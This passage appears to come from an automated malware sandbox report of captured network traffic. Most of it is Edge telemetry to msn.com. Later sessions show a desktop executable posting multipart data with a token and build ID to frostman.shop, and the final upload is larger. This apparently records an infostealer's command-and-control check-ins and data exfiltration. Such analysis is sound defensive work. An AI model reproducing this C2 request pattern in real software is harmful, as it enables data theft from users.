                                                                                                                                                                                                                                                                              Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-20T07:42:32.185Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"c3ee07f3-66ea-4617-a85d-f00c2087a71d","epoch":"1309146888"},"app":{"locale
                                                                                                                                                                                                                                                                              2024-12-20 06:31:57 UTC894INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                              P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                              Set-Cookie: MC1=GUID=eb01e90bfed04ffeade7ed817ba4537a&HASH=eb01&LV=202412&V=4&LU=1734676317380; Domain=.microsoft.com; Expires=Sat, 20 Dec 2025 06:31:57 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                              Set-Cookie: MS0=e07269e18ac845bcb49919770a27a177; Domain=.microsoft.com; Expires=Fri, 20 Dec 2024 07:01:57 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                              time-delta-millis: -4234805
                                                                                                                                                                                                                                                                              Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                              Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                              Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                              Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:57 GMT
                                                                                                                                                                                                                                                                              Connection: close


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              39192.168.2.74993820.42.65.904431552C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:31:58 UTC1033OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734680553042&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                              Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                              Content-Length: 5348
                                                                                                                                                                                                                                                                              sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                              Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                              Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                              Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                              Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                              Cookie: USRLOC=; MUID=2FB26BEE4D14683625707EB54C6669DF; _EDGE_S=F=1&SID=145EA6F856B060B31CAAB3A3577061E4; _EDGE_V=1; msnup=
                                                                                                                                                                                                                                                                              2024-12-20 06:31:58 UTC5348OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 30 54 30 37 3a 34 32 3a 33 33 2e 30 34 31 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 34 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 63 33 65 65 30 37 66 33 2d 36 36 65 61 2d 34 36 31 37 2d 61 38 35 64 2d 66 30 30 63 32 30 38 37 61 37 31 64 22 2c 22 65 70 6f 63 68 22 3a 22 31 33 30 39 31 34 36 38 38 38 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                              Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-20T07:42:33.041Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"c3ee07f3-66ea-4617-a85d-f00c2087a71d","epoch":"1309146888"},"app":{"locale
                                                                                                                                                                                                                                                                              2024-12-20 06:31:58 UTC894INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                              P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                              Set-Cookie: MC1=GUID=8aa6bec2744640c096157cbf6cca0f80&HASH=8aa6&LV=202412&V=4&LU=1734676318219; Domain=.microsoft.com; Expires=Sat, 20 Dec 2025 06:31:58 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                              Set-Cookie: MS0=15f2898bb9f946a39e596a8cb51f806e; Domain=.microsoft.com; Expires=Fri, 20 Dec 2024 07:01:58 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                              time-delta-millis: -4234823
                                                                                                                                                                                                                                                                              Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                              Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                              Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                              Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:57 GMT
                                                                                                                                                                                                                                                                              Connection: close


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              40192.168.2.74993920.42.65.904431552C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:31:58 UTC1033OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734680553187&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                              Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                              Content-Length: 9763
                                                                                                                                                                                                                                                                              sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                              Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                              Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                              Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                              Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                              Cookie: USRLOC=; MUID=2FB26BEE4D14683625707EB54C6669DF; _EDGE_S=F=1&SID=145EA6F856B060B31CAAB3A3577061E4; _EDGE_V=1; msnup=
                                                                                                                                                                                                                                                                              2024-12-20 06:31:58 UTC9763OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 30 54 30 37 3a 34 32 3a 33 33 2e 31 38 36 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 35 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 63 33 65 65 30 37 66 33 2d 36 36 65 61 2d 34 36 31 37 2d 61 38 35 64 2d 66 30 30 63 32 30 38 37 61 37 31 64 22 2c 22 65 70 6f 63 68 22 3a 22 31 33 30 39 31 34 36 38 38 38 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63
                                                                                                                                                                                                                                                                              Data Ascii: {"name":"MS.News.Web.ContentView","time":"2024-12-20T07:42:33.186Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"c3ee07f3-66ea-4617-a85d-f00c2087a71d","epoch":"1309146888"},"app":{"loc
                                                                                                                                                                                                                                                                              2024-12-20 06:31:58 UTC894INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                              P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                              Set-Cookie: MC1=GUID=51d15f9f153f4de797cb063daedcfd35&HASH=51d1&LV=202412&V=4&LU=1734676318375; Domain=.microsoft.com; Expires=Sat, 20 Dec 2025 06:31:58 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                              Set-Cookie: MS0=3870d54140d34b02945186551103302c; Domain=.microsoft.com; Expires=Fri, 20 Dec 2024 07:01:58 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                              time-delta-millis: -4234812
                                                                                                                                                                                                                                                                              Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                              Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                              Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                              Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:57 GMT
                                                                                                                                                                                                                                                                              Connection: close


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              41192.168.2.749945116.203.12.1144436960C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:31:59 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----UKX47GDB1DJEUA1NYM79
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                              Host: frostman.shop
                                                                                                                                                                                                                                                                              Content-Length: 1825
                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                              2024-12-20 06:31:59 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 55 4b 58 34 37 47 44 42 31 44 4a 45 55 41 31 4e 59 4d 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 37 31 64 62 61 65 64 31 32 38 33 34 33 39 33 36 64 33 63 31 66 36 30 37 31 39 66 33 64 39 0d 0a 2d 2d 2d 2d 2d 2d 55 4b 58 34 37 47 44 42 31 44 4a 45 55 41 31 4e 59 4d 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 30 32 39 31 32 31 64 37 30 63 64 30 66 36 39 31 61 61 32 33 66 33 37 34 62 61 64 62 33 32 66 0d 0a 2d 2d 2d 2d 2d 2d 55 4b 58 34 37 47 44 42 31 44 4a 45 55 41 31 4e 59 4d 37 39 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                              Data Ascii: ------UKX47GDB1DJEUA1NYM79Content-Disposition: form-data; name="token"4971dbaed128343936d3c1f60719f3d9------UKX47GDB1DJEUA1NYM79Content-Disposition: form-data; name="build_id"2029121d70cd0f691aa23f374badb32f------UKX47GDB1DJEUA1NYM79Cont
                                                                                                                                                                                                                                                                              2024-12-20 06:32:00 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:32:00 GMT
                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                              2024-12-20 06:32:00 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                              Data Ascii: 2ok0


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              42192.168.2.749954116.203.12.1144436960C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:32:02 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----4E37Q1NOHDJE37900ZMY
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                              Host: frostman.shop
                                                                                                                                                                                                                                                                              Content-Length: 1837
                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                              2024-12-20 06:32:02 UTC1837OUTData Raw: 2d 2d 2d 2d 2d 2d 34 45 33 37 51 31 4e 4f 48 44 4a 45 33 37 39 30 30 5a 4d 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 37 31 64 62 61 65 64 31 32 38 33 34 33 39 33 36 64 33 63 31 66 36 30 37 31 39 66 33 64 39 0d 0a 2d 2d 2d 2d 2d 2d 34 45 33 37 51 31 4e 4f 48 44 4a 45 33 37 39 30 30 5a 4d 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 30 32 39 31 32 31 64 37 30 63 64 30 66 36 39 31 61 61 32 33 66 33 37 34 62 61 64 62 33 32 66 0d 0a 2d 2d 2d 2d 2d 2d 34 45 33 37 51 31 4e 4f 48 44 4a 45 33 37 39 30 30 5a 4d 59 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                              Data Ascii: ------4E37Q1NOHDJE37900ZMYContent-Disposition: form-data; name="token"4971dbaed128343936d3c1f60719f3d9------4E37Q1NOHDJE37900ZMYContent-Disposition: form-data; name="build_id"2029121d70cd0f691aa23f374badb32f------4E37Q1NOHDJE37900ZMYCont
                                                                                                                                                                                                                                                                              2024-12-20 06:32:03 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:32:03 GMT
                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                              2024-12-20 06:32:03 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                              Data Ascii: 2ok0


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              43192.168.2.749961116.203.12.1144436960C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:32:03 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----479RQ1NOHDJMYMYU3ECB
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                              Host: frostman.shop
                                                                                                                                                                                                                                                                              Content-Length: 1837
                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                              2024-12-20 06:32:03 UTC1837OUTData Raw: 2d 2d 2d 2d 2d 2d 34 37 39 52 51 31 4e 4f 48 44 4a 4d 59 4d 59 55 33 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 37 31 64 62 61 65 64 31 32 38 33 34 33 39 33 36 64 33 63 31 66 36 30 37 31 39 66 33 64 39 0d 0a 2d 2d 2d 2d 2d 2d 34 37 39 52 51 31 4e 4f 48 44 4a 4d 59 4d 59 55 33 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 30 32 39 31 32 31 64 37 30 63 64 30 66 36 39 31 61 61 32 33 66 33 37 34 62 61 64 62 33 32 66 0d 0a 2d 2d 2d 2d 2d 2d 34 37 39 52 51 31 4e 4f 48 44 4a 4d 59 4d 59 55 33 45 43 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                              Data Ascii: ------479RQ1NOHDJMYMYU3ECBContent-Disposition: form-data; name="token"4971dbaed128343936d3c1f60719f3d9------479RQ1NOHDJMYMYU3ECBContent-Disposition: form-data; name="build_id"2029121d70cd0f691aa23f374badb32f------479RQ1NOHDJMYMYU3ECBCont
                                                                                                                                                                                                                                                                              2024-12-20 06:32:04 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:32:04 GMT
                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                              2024-12-20 06:32:04 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                              Data Ascii: 2ok0


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              44192.168.2.749970116.203.12.1144436960C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:32:05 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----2DTJEUS2DTRQQIMOZMYM
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                              Host: frostman.shop
                                                                                                                                                                                                                                                                              Content-Length: 1825
                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                              2024-12-20 06:32:05 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 32 44 54 4a 45 55 53 32 44 54 52 51 51 49 4d 4f 5a 4d 59 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 37 31 64 62 61 65 64 31 32 38 33 34 33 39 33 36 64 33 63 31 66 36 30 37 31 39 66 33 64 39 0d 0a 2d 2d 2d 2d 2d 2d 32 44 54 4a 45 55 53 32 44 54 52 51 51 49 4d 4f 5a 4d 59 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 30 32 39 31 32 31 64 37 30 63 64 30 66 36 39 31 61 61 32 33 66 33 37 34 62 61 64 62 33 32 66 0d 0a 2d 2d 2d 2d 2d 2d 32 44 54 4a 45 55 53 32 44 54 52 51 51 49 4d 4f 5a 4d 59 4d 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                              Data Ascii: ------2DTJEUS2DTRQQIMOZMYMContent-Disposition: form-data; name="token"4971dbaed128343936d3c1f60719f3d9------2DTJEUS2DTRQQIMOZMYMContent-Disposition: form-data; name="build_id"2029121d70cd0f691aa23f374badb32f------2DTJEUS2DTRQQIMOZMYMCont
                                                                                                                                                                                                                                                                              2024-12-20 06:32:06 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:32:06 GMT
                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                              2024-12-20 06:32:06 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                              Data Ascii: 2ok0


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              45192.168.2.749973116.203.12.1144436960C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:32:06 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----D2NGDJWL6P8QQQ1DBIMG
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                              Host: frostman.shop
                                                                                                                                                                                                                                                                              Content-Length: 453
                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                              2024-12-20 06:32:06 UTC453OUTData Raw: 2d 2d 2d 2d 2d 2d 44 32 4e 47 44 4a 57 4c 36 50 38 51 51 51 31 44 42 49 4d 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 37 31 64 62 61 65 64 31 32 38 33 34 33 39 33 36 64 33 63 31 66 36 30 37 31 39 66 33 64 39 0d 0a 2d 2d 2d 2d 2d 2d 44 32 4e 47 44 4a 57 4c 36 50 38 51 51 51 31 44 42 49 4d 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 30 32 39 31 32 31 64 37 30 63 64 30 66 36 39 31 61 61 32 33 66 33 37 34 62 61 64 62 33 32 66 0d 0a 2d 2d 2d 2d 2d 2d 44 32 4e 47 44 4a 57 4c 36 50 38 51 51 51 31 44 42 49 4d 47 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                              Data Ascii: ------D2NGDJWL6P8QQQ1DBIMGContent-Disposition: form-data; name="token"4971dbaed128343936d3c1f60719f3d9------D2NGDJWL6P8QQQ1DBIMGContent-Disposition: form-data; name="build_id"2029121d70cd0f691aa23f374badb32f------D2NGDJWL6P8QQQ1DBIMGCont
                                                                                                                                                                                                                                                                              2024-12-20 06:32:07 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:32:07 GMT
                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                              2024-12-20 06:32:07 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                              Data Ascii: 2ok0


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              46192.168.2.749985116.203.12.1144436960C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:32:09 UTC327OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----HLNOHDJEUA1NYU3OHLNY
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                              Host: frostman.shop
                                                                                                                                                                                                                                                                              Content-Length: 98201
                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                              Cache-Control: no-cache
